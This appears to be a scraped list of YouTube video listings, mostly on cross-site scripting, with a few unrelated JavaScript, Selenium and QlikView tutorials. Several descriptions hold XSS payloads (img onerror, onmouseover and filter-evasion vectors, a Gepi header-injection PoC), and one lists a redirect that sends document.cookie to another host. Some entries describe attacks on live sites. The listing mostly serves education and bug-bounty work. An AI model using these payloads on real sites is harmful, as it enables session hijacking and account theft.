Basic XSS Guide #1 -  Alert() - Redirection - Cookie Stealing

Channel Title : JackkTutorials

Views : 65676

Likes : 713

DisLikes : 39

Published Date : 2016-04-05T23:00:00.000Z

Visit https://bugcrowd.com/jackktutorials to get started in your security research career! G2A Re-link: https://www.g2a.com/?reflink=jackk1337 In this tutorial jackktutorials shows you how to get started with XSS Cross Site Scripting in BWAPP including Alert(), Webpage redirection and Cookie Stealing. LINKS AND RESOURCES ************************* Cookie Stealing Tutorial - https://youtu.be/Nv6CPs_j7hc XSS Definition - https://en.wikipedia.org/wiki/Cross-site_scripting Cookie Stealer Source - https://www.jackktutorials.com/?page_id=21 WAMP Server - http://www.wampserver.com/en/ GET MORE JACKKTUTORIALS! ******************************** Website: http://www.jackktutorials.com Forums: http://www.jackktutorials.com/forums Facebook: http://www.facebook.com/jackktutorials Twitter: http://www.twitter.com/jackk1337 Email: [email protected] Business Contact: [email protected] G2A Re-link: https://www.g2a.com/?reflink=jackk1337
Cracking Websites with Cross Site Scripting - Computerphile

Channel Title : Computerphile

Views : 978886

Likes : 20365

DisLikes : 397

Published Date : 2013-10-23T13:56:48.000Z

Audible free book: http://www.audible.com/computerphile JavaScript is dangerous! Why? How are websites vulnerable to it? Find out about bug-bounties from Tom Scott. More from Tom Scott: http://www.youtube.com/user/enyay and https://twitter.com/tomscott http://www.facebook.com/computerphile https://twitter.com/computer_phile This video was filmed and edited by Sean Riley. Computerphile is a sister project to Brady Haran's Numberphile. See the full list of Brady's video projects at: http://bit.ly/bradychannels

Channel Title : ali hayali

Views : 21

Likes : 0

DisLikes : 0

Published Date : 2017-11-06T13:21:21.000Z

Hiding JavaScript in Picture Files for XSS

Channel Title : Don Does 30 Official

Views : 12973

Likes : 305

DisLikes : 17

Published Date : 2017-10-12T20:11:04.000Z

How to hide JavaScript in GIF, BMP, WEBP, PNM, or PGF files for the purposes of cross-site scripting. The site is required to receive the file without stripping metadata, and needs to be vulnerable to XSS to run the script (future tutorial). Git: https://github.com/jklmnn/imagejs
Steal sensitive information & credentials with XSS

Channel Title : Shawar Khan

Views : 3417

Likes : 44

DisLikes : 4

Published Date : 2016-05-05T18:21:21.000Z

Disclaimer: This video is only for educational purposes. I am not responsible for any damage done using this technique. A technique used for stealing sensitive information and credentials of a user using XSS vulnerability. View full article on http://shawarkhan.com

Channel Title : Rekcah Nexus

Views : 157

Likes : 1

DisLikes : 0

Published Date : 2013-03-26T04:20:33.000Z


Channel Title : kof2002

Views : 214

Likes : 1

DisLikes : 0

Published Date : 2014-03-27T23:56:01.000Z

t" onmouseover=prompt(document.domain);a=t

Channel Title : Alexander Yang

Views : 203

Likes : 0

DisLikes : 0

Published Date : 2011-12-14T21:01:51.000Z

http://shafigullin.pro/share.html?' http://shafigullin.pro/share.html?" http://shafigullin.pro/share.html?#'
Security(Section access, Section Application) and Hidden Script - QlikView Tutorial - Session 17

Channel Title : Trending Courses

Views : 138

Likes : 2

DisLikes : 0

Published Date : 2018-12-06T13:04:59.000Z

In this session you will learn about Security (Section Access, Section Application) and Hidden Script.

Security
  Document Level: Section Access
  Server Level: QlikView Publisher

Section Access

    Section Access;
    Load * ..................;
    Section Application;

    ACCESS,USERID,PASSWORD,NTUSER,NTDOMAIN,SERIAL,OMIT

    Section Access;
    Load * Inline [
    ACCESS,USERID,PASSWORD,LINK
    ADMIN,admin,admin,*
    USER,user1,user1,US
    USER,user2,user2,UK
    USER,user3,user3,FR
    USER,user1,user1,UK
    USER,user4,user4
    ];
    Section Application;
    Sales:
    Load * Inline [
    LINK, Country, Sales
    US, USA, 1000
    UK, United Kingdom, 800
    FR, France, 750
    DE, Germany, 940
    ];
Persistent XSS Header Injection on GEPI

Channel Title : !m0Nk3y_

Views : 401

Likes : 7

DisLikes : 0

Published Date : 2013-11-20T17:41:01.000Z

Product : Gepi
Tested Version : 1.5.1
Vendor Notification : October 10, 2013
Vendor Patch : October 14, 2013
Public Disclosure : November 20, 2013
Vulnerability Type : Persistent Cross-Site Scripting
Risk Level : High
Discovered by : Yvann Le Fay; !m0Nk3y_
PoC : When you are on the login page, type the id of your victim, for example lefay_p, type any password and launch Tamper Data |firefox module or other like|, tamper the header parameter and set User-Agent to $script$alert|'String'|$/script$, then send the request. When the user goes to his history of connections, the JavaScript will be executed in his browser.
Solution : Update to Gepi 1.6.2
More Information: http://gepi.mutualibre.org/fr/download

I was 13 :p, the same year I got the root access to ac-versailles with my friend Gauthier in two different ways (social engineering, spip vulnerability, & https://bugzilla.redhat.com/show_bug.cgi?id=962792), I reported it.

Channel Title : HACK THE PLANET

Views : 74

Likes : 0

DisLikes : 0

Published Date : 2017-04-21T14:27:51.000Z

How to Attack on cross site scripting vulnerable websites (XSS)

Channel Title : A Team

Views : 838

Likes : 5

DisLikes : 5

Published Date : 2018-08-20T18:39:08.000Z

How to Attack on cross site scripting vulnerable site (XSS) Hey guys! Rogue Flame from A Team here, back again with another video. In this video, we will be looking at how to attack Vulnerable cross-site script XSS website using google dork. cross site scripting vulnerable website find cross site scripting vulnerable website (XSS) How to Attack on cross site scripting vulnerable website (XSS) XSS vulnerable attack XSS vulnerable sites 2018. XSS vulnerable website. I hope you enjoy/enjoyed the video. If you have any questions or suggestions feel free to ask them in the comments section. Thanks for watching! Social media: Facebook https://www.facebook.com/ateamadmin
"><img src=x onerror=alert(document.domain)>

Channel Title : charlie'z yoski\

Views : 1057

Likes : 0

DisLikes : 0

Published Date : 2015-02-08T23:14:12.000Z

"><img src=x onerror=alert(document.domain)>
XSS (cross site scripting ) filter evasion series stage 8

Channel Title : Vishwaraj Bhattrai

Views : 1051

Likes : 3

DisLikes : 0

Published Date : 2015-02-02T06:19:14.000Z

payload used : javascript:alert(document.domain); challenge link : http:--xss-quiz.int21h.jp-stage008.php
Cross Site Scripting (XSS)-3 (XSS stored IFRAME and COOKIE Exploit)

Channel Title : Hacking Monks

Views : 4502

Likes : 35

DisLikes : 4

Published Date : 2017-01-11T16:22:36.000Z

Hello guys. We are the hacking monks. Here is our blog – http://www.hackingmonks.net/p/home.html Here is our Facebook Page - https://www.facebook.com/Hacking-Monks-1589849474562976/?ref=settings
Cross-site Scripting (XSS)

Channel Title : Z. Cliffe Schreuders

Views : 175

Likes : 4

DisLikes : 0

Published Date : 2018-06-09T09:58:59.000Z

This video is part of the computer/information/cyber security and ethical hacking lecture series; by Z. Cliffe Schreuders at Leeds Beckett University. Laboratory work sheets, slides, and other open educational resources are available at http://z.cliffe.schreuders.org. The slides themselves are creative commons licensed CC-BY-SA, and images used are licensed as individually attributed.

Topics covered in this lecture include:

Code injection
- Client-side scripts are injected into a vulnerable website
- The script gets “served up” to victims (other users of the website)
- The script can misbehave! This can have severe security consequences
- Guess How many XSS disclosed via CVE since last month? https://nvd.nist.gov/vuln/search/results?adv_search=true&form_type=advanced&results_type=overview&cwe_id=CWE-79&mod_date_start_month=0&mod_date_start_year=2018

XSS is the most prevalent security vulnerability
- XSS is the most prevalent type of Web security vulnerability
- Reported and exploited since the 90s
- Surpassed buffer overflows (CVE database stats: https://cwe.mitre.org/documents/vuln-trends/index.html)

Malicious content
- The website gets malicious content mixed in with the original website
- The attacker’s script gains access to:
  - Page content
  - Cookies, session information
  - Anything the page contains or does
- These can be altered or sent to the attacker by the script

Malicious content
- Can result in session hijacking!
- Account take over
- Disclosure of sensitive/personal data
- Performing actions on behalf of victims
- Modification of web content via content spoofing
- Redirecting to other websites
- Showing ads
- Potentially for all users on the site!
- Example: Twitter https://www.youtube.com/watch?v=zv0kZKC6GAM

Same-origin policy
- Origin: URI scheme, host name, and port number
- Scripts on pages from the same origin get access to data/DOM/cookies
- Without same-origin policy any website could take control of any other site
- Imagine Internet banking without those protections
- There are tightly controlled ways web pages/tabs can relax these protections, to share data or pass messages
- Cross-document messaging

Non-persistent, AKA reflected XSS, AKA Type-II XSS
- The malicious script sent to the server by the web client
- For example in the URL
- If the server echoes input into the HTML (without sanitisation) then code injection may be possible
- Usually sent by the attacker to the victim via email, IM, website, etc
- Innocent looking URLs, pointing to the trusted server
- When the victim opens the link, results in the malicious script running in the victim’s browser
- Nothing is actually stored on the server (other than logs)

Persistent, AKA stored XSS, AKA Type-I XSS
- When the server stores input that is later echoed to (other) users without proper validation/sanitisation
- Malicious scripts can be sent to the server, which will be stored (in a database), and then fed to victims
- Stored XSS can affect all the users of a website

Server-side vs DOM-based (client side)
- Traditionally XSS relays the script via a web server
- When more logic is run on the client (for example, with modern web apps), XSS can also be directed against client logic
- For example, JQuery plugins have been vulnerable to this

Facebook $3,500 USD Bug Bounty

YouTube Stored XSS in comments

Testing for XSS
- Try as input:
- Audit the source code and look for where the input makes its way back to HTML, and check it is validated and sanitised

Un-sanitised input and command injection
- All data that comes from an untrusted source must be validated and sanitised before use
- What is an untrusted source?: pretty much everything external to the software (URL, user input, etc)
- Validation: check it is in the format you expect
- Sanitisation: remove any potentially dangerous formatting / content

Sanitising input
- Validation at server or client
- Must happen on the server
- Should also happen on the client if there is logic in the client

Prevention
- Web sites should use safe encoding methods to ensure that the input data is not interpreted as code
- For example, Convert these characters:
- Escape all input using appropriate safe libraries

Prevention
- When input is poorly sanitised, clever attacks are still possible
- For example, without recursive sanitisation, one parse might end up with a malicious string
- There are multiple methods for injecting JS, not just via script tags

Prevention
- https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules_Summary
XSS Cross Site Scripting Demonstration

Channel Title : Imperva

Views : 185997

Likes : 434

DisLikes : 32

Published Date : 2009-07-02T03:17:49.000Z

Cross-site scripting ('XSS' or 'CSS') is an attack that takes advantage of a Web site vulnerability in which the site displays content that includes un-sanitized user-provided data. For example, an attacker might place a hyperlink with an embedded malicious script into an online discussion forum. The purpose of the malicious script is to attack other forum users who happen to select the hyperlink. For example, it could copy user cookies and then send those cookies to the attacker. The Script Injection video should be watched before this video for greater understanding.
From XSS to Domain Admin - Demo

Channel Title : eLearnSecurity

Views : 950

Likes : 4

DisLikes : 0

Published Date : 2015-07-05T14:41:42.000Z

http://ow.ly/PcdcK A demonstration of a real world network penetration test. The network has up-to-date client and server operating systems, a DMZ between two firewalls and a company website. IT Security Researcher, Davide "GiRa" Girardi, tries to gain full access to an Active Directory Administrator Account. Watch the full pentest for FREE here: http://ow.ly/PcdcK
Copy of xss'-confirm(document.domain)-'

Channel Title : Deepak tqwe

Views : 13

Likes : 0

DisLikes : 1

Published Date : 2017-03-01T17:54:54.000Z

Cross-Site Scripting Explained - Part 7: HTML Events

Channel Title : webpwnized

Views : 4989

Likes : 16

DisLikes : 0

Published Date : 2012-01-29T16:45:52.000Z

Author: Jeremy Druin Twitter: @webpwnized Description: This video demonstrates injecting cross site scripts into HTML events. The example requires a prefix to close off an existing JavaScript statement in the onclick event targeted. Any script injected into the HTML event will be executed when the user clicks the BACK button on the page. Mutillidae is a free web application which is vulnerable on purpose to give a training environment for pen testers, security enthusiasts, universities, and as a target for evaluating vulnerability assessment tools. Updates about Mutillidae are announced on Twitter at @webpwnized. Mutillidae can be downloaded from irongeek.com Thank you for watching. Please support this channel. Up vote, subscribe or even donate by clicking "Support" at https://www.youtube.com/user/webpwnized! The webpwnized YouTube channel is dedicated to information security, security testing and ethical hacking. There is an emphasis on web application security but many other topics are covered. Some of these include forensics, network security, security testing tools and security testing processes. The channel provides videos to encourage software developers and system administrators to perform security testing. Also, the channel educates the next generation of security testers and bug bounty hunters who want to respectfully, legally and ethically help system owners that allow security testing.
How to Redirect Stored XSS

Channel Title : Dragunman White Hat

Views : 560

Likes : 1

DisLikes : 0

Published Date : 2015-11-14T15:31:22.000Z

How to Redirect Stored XSS

What is Stored XSS? Stored XSS attacks involve an attacker injecting a script (referred to as the payload) that is permanently stored (persisted) on the target application, for instance within a database. The classic example of stored XSS is a malicious script inserted by an attacker in a comment field on a blog or in a forum post.

Detail of Stored XSS: Cross Site Scripting (XSS) attacks are an instance of injection problems in which malicious scripts are injected into otherwise benign and trusted web sites. Cross Site Scripting (XSS) vulnerabilities occur when: 1. Data enters a Web application through an untrusted source, most frequently a web request. 2. The data is included in dynamic content that is sent to a web user without being validated for malicious code. The malicious content sent to the web browser often takes the form of a segment of JavaScript but may also include HTML, Flash or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.

Confidentiality: The most common attack performed with cross-site scripting involves the disclosure of information stored in user cookies.
Access control: In some circumstances it may be possible to run arbitrary code on a victim's computer when cross site scripting is combined with other flaws.
Exposure Period: Implementation: If bulletin-board style functionality is present, cross-site scripting may only be deterred at implementation time.

For more information open this link: http://www.dragunman.com/how-redirect-stored-cross-site-scripting-xss Just For Education Purpose.
XSS on Google Search - Sanitizing HTML in The Client?

Channel Title : LiveOverflow

Views : 315345

Likes : 9501

DisLikes : 136

Published Date : 2019-03-31T11:57:21.000Z

An actual XSS on google.com by Masato Kinugawa. It abuses a parsing differential between a JavaScript enabled and disabled context. The fix: https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa -=[ ❤️ Support ]=- → per Video: https://www.patreon.com/join/liveoverflow → per Month: https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w/join -=[ 🔴 Stuff I use ]=- → Microphone:* https://amzn.to/2LW6ldx → Graphics tablet:* https://amzn.to/2C8djYj → Camera#1 for streaming:* https://amzn.to/2SJ66VM → Lens for streaming:* https://amzn.to/2CdG31I → Connect Camera#1 to PC:* https://amzn.to/2VDRhWj → Camera#2 for electronics:* https://amzn.to/2LWxehv → Lens for macro shots:* https://amzn.to/2C5tXrw → Keyboard:* https://amzn.to/2LZgCFD → Headphones:* https://amzn.to/2M2KhxW -=[ 🐕 Social ]=- → Twitter: https://twitter.com/LiveOverflow/ → Website: https://liveoverflow.com/ → Subreddit: https://www.reddit.com/r/LiveOverflow/ → Facebook: https://www.facebook.com/LiveOverflow/ -=[ 📄 P.S. ]=- All links with "*" are affiliate links. LiveOverflow / Security Flag GmbH is part of the Amazon Affiliate Partner Programm.
Exploiting a Cross-site Scripting (XSS) vulnerability on Facebook

Channel Title : acunetix

Views : 41620

Likes : 75

DisLikes : 19

Published Date : 2010-07-27T09:53:44.000Z

The following video shows how an attacker may exploit a cross-site scripting vulnerability on Facebook.com regardless of the HTTPOnly cookie protection used. Of course, this goes way beyond showing an "alert()" popup in Javascript, since the attacker is also able to hijack the victim's Facebook account. We also published an article to explain in more technical detail the works behind abusing such a flaw. http://www.acunetix.com/websitesecurity/xss-facebook.htm Facebook rates as the second most popular website on the internet with 400 million active users. When such a website has common web application security flaws, they are going to be abused for one's gain. When we came across an obvious cross-site scripting vulnerability, we decided to show that an attacker could do that. We worked with Facebook to make sure that this vulnerability is fixed. We would like to thank their security team for quickly fixing it. For more information visit http://www.acunetix.com
Cross-Site Scripting(XSS) using image file upload

Channel Title : Shawar Khan

Views : 14813

Likes : 69

DisLikes : 36

Published Date : 2015-07-21T04:39:38.000Z

In this video I will tell you about executing a cross-site scripting (XSS) attack using a file upload. This method can be used with other file types like bmp, png and other types. Site: Shawarkhan.com Facebook: www.facebook.com/shawarkhanskofficial
XSS (cross site scripting ) filter evasion series stage 6

Channel Title : Vishwaraj Bhattrai

Views : 1167

Likes : 6

DisLikes : 0

Published Date : 2015-02-01T10:52:56.000Z

xss vector used is onmouseover="prompt(document.domain);"" Link for the challenge 6 http:-- xss-quiz.int21h.jp-stage-no6.php
XSS (cross site scripting ) filter evasion series stage 7

Channel Title : Vishwaraj Bhattrai

Views : 751

Likes : 6

DisLikes : 0

Published Date : 2015-02-02T06:02:12.000Z

Payload used : a onmouseover=prompt(document.domain); challenge link : s-quiz.int21h.jp-stage07.php
video127 script alert('test1');/script http://example.com/  #cool

Channel Title : socialisten Area 51

Views : 145

Likes : 3

DisLikes : 2

Published Date : 2015-05-04T09:33:52.000Z

© scriptalert('cookie!');/script or are you strongbold/strong or let's see "what & we can ﶾ or cannot @bananorama do +test   - 00a0 link. äöü bo/b #tag next "l' H&M scriptalert('c');/script ' ' http://socialisten.at/ MENTION tab ends 00a0
XSS show document.cookie on disneyshop.com

Channel Title : Dhiemas Adi Pradana

Views : 32

Likes : 4

DisLikes : 0

Published Date : 2019-04-10T12:14:22.000Z

Show cookie data with XSS payload on disneyshop.com. This is reflected XSS made a medium impact for the site. Subscribe for more videos contact : [email protected]
Step by Step HTTP Cookie Tutorial

Channel Title : Hussein Nasser

Views : 482

Likes : 31

DisLikes : 0

Published Date : 2019-05-02T02:57:11.000Z

💻 More Software engineering videos https://www.youtube.com/playlist?list=PLQnljOFTspQXOkIpdwjsMlVqkIffdqZ2K

HTTP Cookies are small pieces of data that are used as storage medium in the browser and are also sent to the server with each request. Cookies are mainly used for session management, user personalization, and tracking. In this video we will try to demystify cookies and learn everything there is to them by example and with demos as well!

Creating Cookies
1. document.cookie (client side)
2. Set-Cookie header (server side)

Cookies Properties

Sent with each request: Cookies are automatically sent to the server with each request, so be careful not to stuff your app with cookies because it might slow down as network bandwidth becomes saturated with bloated requests.

Per Domain: They are stored per domain; think of them as cookie buckets. For instance, you visit google.com, you will get a specific cookie for google.com; any cookies created while in google.com will go to the google.com bucket and so on. There are exceptions but this is the general rule. By default if you create a cookie, it will only be accessible within the domain, it will only be sent to the same domain. You can create a cookie with the domain property which will also include subdomains. Example: domain=husseinnasser.com includes blog.husseinnasser.com, about.husseinnasser.com etc. Example.com www.example.com

Path specific cookies: cookies for a given path only. /r1 /r2 routes make only cookie for r1 and cookie for r2; client will only send cookies for that path. If you know you are going to use the cookies in certain paths why waste precious bandwidth sending it with every path?

Cookies Types
1. Session cookie - no expires or max-age, once browser close they are “deleted”; browsers are being smart and keep them though
2. Permanent cookie - set max-age
3. httponly cookie - cannot be accessed with document.cookie
4. Secure cookie - only acceptable with https
5. Third party cookie - page references another page, gets its own cookies
6. Zombie Cookies - recreated even after users delete them, e-tags from the server

Cookie Security
1. Stealing cookies, inject XSS script
2. Cross site request forgery, more dangerous and easier: I don’t want your cookie, I just want to make a request on your behalf using your cookie and make myself an advantage as a result. Since you are signed in to your bank I will inject a script that makes a request to YOUR bank to transfer myself money. samesite

Stay Awesome! Hussein
Hacking 101 - Cross site scripting - web security tutorial

Channel Title : GhostBit

Views : 210

Likes : 6

DisLikes : 0

Published Date : 2019-03-16T09:24:30.000Z

Hello World! Welcome to my channel. In this video, I am going to show you what Cross site scripting is and how to use it.

What is Cross site scripting? Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. There are 3 types of XSS, I'm going to talk about the 2 most used:

►Reflected XSS Attack: When an attacker injects his malicious script into a search query, a search box, or the end of a URL, it's called a Reflected XSS Attack. It's like throwing a ball against a wall and receiving it back.

►Stored XSS Attack: Is when an injected XSS script is stored permanently on a website, for example in a guestbook or bulletin board. Stored XSS hits everyone who just reaches the site with the malicious code.

How to Protect Yourself: The primary defenses against XSS are described in the OWASP XSS Prevention Cheat Sheet. Also, it's crucial that you turn off HTTP TRACE support on all web servers. An attacker can steal cookie data via Javascript even when document.cookie is disabled or not supported by the client. This attack is mounted when a user posts a malicious script to a forum so when another user clicks the link, an asynchronous HTTP Trace call is triggered which collects the user's cookie information from the server, and then sends it over to another malicious server that collects the cookie information so the attacker can mount a session hijack attack. This is easily mitigated by removing support for HTTP TRACE on all web servers.

Thanks for watching my video, hit the like button, subscribe to this channel and press the bell icon for more videos.
►"Install bwapp in xampp": https://youtu.be/N95oGV4QNro subscribe": https://goo.gl/9kbN6d ►"Free Ethical Hacking Course": https://goo.gl/oVMSpf ►"Hacking 101- Find Sub-Domain- web security tutorial":https://youtu.be/vLFoFi7RJ3c ►"Domain Information Gathering": https://youtu.be/SL3nufBODUY ►"Convert Any File Or Folder Into ISO File.":https://youtu.be/8F-YLnrwjxA ►"how to hack windows 10." https://www.youtube.com/watch?v=T8mtHFA2wPI ►"How to use phishing attacks for Facebook." https://www.youtube.com/watch?v=TaWKeS7yzBg ►"how to change IP address and location." https://www.youtube.com/watch?v=-yzgPrs1oms ~-~~-~~~-~~-~- ~-~~-~~~-~~-~- Tobu - Colors [NCS Release] https://youtu.be/MEJCwccKWG0 http://www.youtube.com/tobuofficial Music promoted by Audio Library https://youtu.be/PQC7VaL7xlc -~-~~-~~~-~~-~-
window location in JavaScript

Channel Title : kudvenkat

Views : 36211

Likes : 121

DisLikes : 3

Published Date : 2015-02-24T20:22:35.000Z

Link for all dot net and sql server video tutorial playlists http://www.youtube.com/user/kudvenkat/playlists
Link for slides, code samples and text version of the video http://csharp-video-tutorials.blogspot.com/2015/02/windowlocation-in-javascript.html

In this video we will discuss the use of the Location object. The window.location property returns a Location object that can be used to get information about the current page. The window.location property can also be used to redirect the browser to a new page.

In Part 73 of the JavaScript tutorial we discussed how to detect if JavaScript is enabled by using the <noscript> element. Another way is by using the window.location property. Let us use the example we worked with in Part 73. We will use the window.location property along with the <noscript> element to detect if JavaScript is enabled.

Add a new HTML page to your project. Name it Default.htm. Copy and paste the following HTML and JavaScript.

    <html>
    <head>
        <script>
            // If JavaScript is enabled this code redirects the user to HTMLPage1.htm
            // If JavaScript is disabled this code will not execute, the user remains on this
            // page and gets to see the message that JavaScript is disabled.
            window.location = "/HTMLPage1.htm";
        </script>
    </head>
    <body>
        <h1>It seems that you have disabled JavaScript. Please enable JavaScript.</h1>
    </body>
    </html>

We don't need to make any modification to HTMLPage1.htm. At this point, if you have JavaScript enabled and you visit the Default.htm page, you will be redirected to HTMLPage1.htm. If you have JavaScript disabled and you visit the Default.htm page, you will remain on the Default.htm page and you will get to see the message that says JavaScript is disabled.

The window.location property is especially useful if you have 2 sites:
1. One for users with JavaScript
2. Another for users without JavaScript

Make the home page of the non-JavaScript website the default page. In the default page include the following JavaScript code to redirect the user to JavaScript-EnabledSite.com:

    window.location = "http://www.JavaScript-EnabledSite.com";

If you have JavaScript enabled, you will be redirected to the JavaScript enabled website. If you have JavaScript disabled, you will not be redirected and stay with the website which works without JavaScript.

Some of the useful properties of the location object:
window.location.href - Returns the URL of the current page
window.location.hostname - Returns the domain name
window.location.protocol - Returns the protocol (http or https)
window.location.pathname - Returns the path of the current page

    <script type="text/javascript">
        // Write each location property on its own line of the page
        document.write("window.location.href = " + window.location.href + "<br/>");
        document.write("window.location.hostname = " + window.location.hostname + "<br/>");
        document.write("window.location.pathname = " + window.location.pathname + "<br/>");
        document.write("window.location.protocol = " + window.location.protocol + "<br/>");
    </script>

Output :
window.location.href = http://localhost:57695/Default.htm
window.location.hostname = localhost
window.location.pathname = /Default.htm
window.location.protocol = http:
Unpatched Facebook (investor.fb.com) User-Agent Cross Site Scripting Vulnerability

Channel Title : Xowia Vulnerability Lab

Views : 438

Likes : 0

DisLikes : 0

Published Date : 2015-05-05T06:05:06.000Z

Here is the user-agent cross site scripting vulnerability in investor.fb.com that is still unpatched. Our security researchers reported it to Facebook but according to them this is not a security bug. And we asked for make a public disclosure, in return they don't have any issue.
A Tutorial On XSS Attack (Cross Site Scripting)

Channel Title : Mushahid Ali

Views : 1978

Likes : 14

DisLikes : 2

Published Date : 2016-09-05T12:45:59.000Z

Sup, Guys. This Is Mushahid Ali Doing A TUTORIAL On XSS Attack. Hope You Guys Liked It. Also Please Rate, Like, Comment, Share And Subscribe To Get The Latest Videos On Hacks , Comedy And Stuff. Here Are Some Of The XSS Code's : scriptalert1'XXSED By Mushahid Ali!'1/script code onclick="alert1'XXSED By Mushahid Ali'1"CLICK HERE TO GET YOURSELF HACKED !/code script document.location="www.google.com"document.cookie /script " script alert1"XSSED-By-Mushahid Ali"1 /script " script alert1/XSSED-By-Mushahid Ali/1 /script SCRIPT alert1"XSSED-By-Mushahid Ali"1;// /SCRIPT %253cscript%253ealert1/XSSED-By-Mushahid Ali/1%253c/script%253e foo script alert1/XSSED-By-Mushahid Ali/1 /script scr script ipt alert1/XSSED-By-Mushahid Ali/1 /scr /script ipt Most Importantly, I Smile A Lot And Want To Make You Feel Happy. Subscribe! My FaceBook : https://www.facebook.com/mushahid.ali.777 My Facebook Page : https://www.facebook.com/MushahidAliOfficialPage/ Follow Me @ Twitter : https://www.twitter.com/alimushahid24/ My Official Website : https://officialpage-f880e.firebaseapp.com/ The Background Theme Used In The Video Is Different Heaven & EH!DE - My Heart [NCS Release]. Here's The A Link To It : https://www.youtube.com/watch?v=jK2aIUmmdP4 Thanks For Watching And Don't Forget To Keep Smiling =D !
stored xss bypassed ||onmouseover

Channel Title : Being Anonymous-Sandip

Views : 65

Likes : 2

DisLikes : 1

Published Date : 2018-06-10T06:13:10.000Z

victim site: https://bit.ly/2sYFIvw Many bugs are found on this site. Short demo. Check out.
JavaScript Executor in Selenium WebDriver

Channel Title : Specialize Automation

Views : 3785

Likes : 25

DisLikes : 9

Published Date : 2017-10-29T10:58:57.000Z

Learn how to use JavaScript in Selenium and the top 10 JavaScript functions in Selenium WebDriver. Using JavaScript we can directly interact with the HTML DOM to work on a webpage.
JavaScript in Selenium WebDriver
How to navigate URL using JavaScript
How to fetch webElement using JavaScript
How to refresh page using JavaScript
How to get innertext of a page using JavaScript
How to click on a webelement using JavaScript
How to open a link in same tab using JavaScript
How to scroll in Selenium WebDriver using JavaScript
How to scroll to an element in Selenium using JavaScript
How to do vertical scroll in Selenium using JavaScript
How to highlight webElement in Selenium using JavaScript
How to find total frames in Selenium using JavaScript

JavascriptExecutor js = (JavascriptExecutor) driver;
// Navigate: pass the URL as an argument rather than concatenating it into the script text
js.executeScript("window.location = arguments[0];", url);
// Refresh the page
js.executeScript("history.go(0)");
// Read the page title
String sText = js.executeScript("return document.title;").toString();
// Fetch an element
WebElement search = (WebElement) js.executeScript("return document.getElementById('searchBtn');");
// Count frames (the script must return a value, otherwise executeScript yields null)
String frames = js.executeScript("return window.frames.length;").toString();
// Scroll to an element, then scroll by an offset
js.executeScript("arguments[0].scrollIntoView(true);", element);
js.executeScript("window.scrollBy(300,2000)");
// Highlight an element
js.executeScript("arguments[0].setAttribute('style', arguments[1]);", ele, "background:" + "yellow; color: Red; border: 4px dotted solid yellow;");
// Click an element
js.executeScript("arguments[0].click();", element);
js.executeScript("arguments[0].setAttribute('target','_self');", element); // to open in same tab
// Dialogs
js.executeScript("alert('Enter your Facebook credentials');");
js.executeScript("confirm('Enter your Facebook credentials');");
js.executeScript("prompt('Enter your credentials','Enter domain');");

Linkedin: https://www.linkedin.com/in/aditya-kumar-roy-b3673368/ Facebook: https://www.facebook.com/SpecializeAutomation/
XSS in sandbox domains GOOGLE

Channel Title : MMMAAA OOOUUU

Views : 232

Likes : 1

DisLikes : 0

Published Date : 2015-07-16T06:27:23.000Z

Google uses a range of sandbox domains to safely host various types of user-generated content. Many of these sandboxes are specifically meant to isolate user-uploaded HTML, JavaScript, or Flash applets and make sure that they can't access any user data. For this reason, we recommend using alert(document.domain) instead of alert(1) as your default XSS payload. In particular, if you see script execution in any subdomains of the domains in this list:
ad.doubleclick.net
googleusercontent.com
googlecode.com
codespot.com
feeds.feedburner.com
googleadservices.com
googledrive.com
googlegroups.com
{your-blog-name}.blogspot.com
{your-app-name}.appspot.com

Channel Title : Abk Khan

Views : 112

Likes : 0

DisLikes : 0

Published Date : 2015-02-09T18:43:31.000Z

"><img src=x onerror=prompt(document.domain);>
Calling live json web service using jquery ajax

Channel Title : kudvenkat

Views : 64760

Likes : 336

DisLikes : 9

Published Date : 2015-06-17T20:20:07.000Z

Link for all dot net and sql server video tutorial playlists https://www.youtube.com/user/kudvenkat/playlists?sort=dd&view=1
Link for slides, code samples and text version of the video http://csharp-video-tutorials.blogspot.com/2015/06/calling-live-json-web-service-using.html

In this video we will discuss how to call a live weather web service that returns JSON data using jquery ajax. For the purpose of this demo, we will be using the live weather web service that returns JSON data. The web service can be found at the following URL. http://openweathermap.org/current

We want to retrieve weather data from the web service and display it on a web page. Here is the HTML and jQuery code used in the demo

<html>
<head>
    <script src="jquery-1.11.2.js"></script>
    <script type="text/javascript">
        $(document).ready(function () {
            $('#btnGetWeather').click(function () {
                var resultElement = $('#resultDiv');
                resultElement.html('');

                var requestData = $('#txtCity').val() + ',' + $('#txtCountry').val();

                $.ajax({
                    url: 'http://api.openweathermap.org/data/2.5/weather',
                    method: 'get',
                    data: { q: requestData },
                    dataType: 'json',
                    success: function (response) {
                        // Values from the web service are written as text nodes,
                        // so they are never parsed as HTML by the page
                        if (response.message != null) {
                            resultElement.text(response.message);
                        } else {
                            resultElement.empty().append(
                                document.createTextNode('Weather: ' + response.weather[0].main),
                                '<br/>',
                                document.createTextNode('Description: ' + response.weather[0].description));
                        }
                    },
                    error: function (err) {
                        alert(err);
                    }
                });
            });
        });
    </script>
</head>
<body style="font-family:Arial">
    <table>
        <tr>
            <td>City</td>
            <td><input type="text" id="txtCity" /></td>
        </tr>
        <tr>
            <td>Country</td>
            <td><input type="text" id="txtCountry" /></td>
        </tr>
    </table>
    <input type="button" id="btnGetWeather" value="Get Weather Data">
    <br /><br />
    <div id="resultDiv">
    </div>
</body>
</html>

Channel Title : Alyssa Herrera

Views : 148

Likes : 15

DisLikes : 0

Published Date : 2016-07-01T19:13:09.000Z

